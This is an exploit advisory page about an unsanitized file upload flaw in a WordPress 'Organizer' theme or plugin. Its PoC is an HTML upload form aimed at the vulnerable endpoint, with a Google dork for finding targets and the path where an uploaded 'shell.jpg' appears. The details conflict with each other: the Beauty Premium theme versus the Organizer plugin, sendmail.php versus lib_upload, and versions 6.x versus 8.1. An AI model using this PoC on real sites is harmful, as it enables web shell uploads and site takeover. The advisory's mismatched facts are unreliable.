Wordpress Plugin Organizer File 6.x Upload Vulnerability

2017.05.10
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<!-- * Exploit Title: Wordpress Plugin Organizer File Upload Vulnerability 6.x * Discovery Date: 2017-05-09 * Public Disclosure Date:2017-05-09 * Vendor Homepage: http://www.tools-hack.com * Exploit Author: sohaip-hackerDZ * forum http://www.spyhackerz.com/forum/ * Contact: https://www.facebook.com/sohaipbarika * Version: 8.1 (may affect newer versions but this was all I had) * Tested on: Wordpress 4.2.x-4.7.x Description ================================================================================ The Beauty Premium theme contains a contact form that is vulnerable to CSRF and File Upload vulnerability in the sendmail.php file. The file attachment gets uploaded to the wordpress upload directory and it is not sanitized, allowing attackers to upload harmful code. PoC ================================================================================ Google Dork inurl:/themes/organizer or detect via WPScan: --> <html> <body> <form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/organizer/lib_upload/server/php/" method="post"> select fuile: <input name="files[]" type="file" /><br /> <input type="submit" value="submit!" /> </form> </body> </html> <!-- File will be visible: http://127.0.0.1/wp-content/themes/organizer/lib_upload/server/php/files/shell.jpg You will receive a 404 error after posting, but navigate to the sites upload directory and access your uploaded file directly. Update to version 8.1 8.1 https://downloads.wordpress.org/plugin/plugin-organizer.8.1.zip -->


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top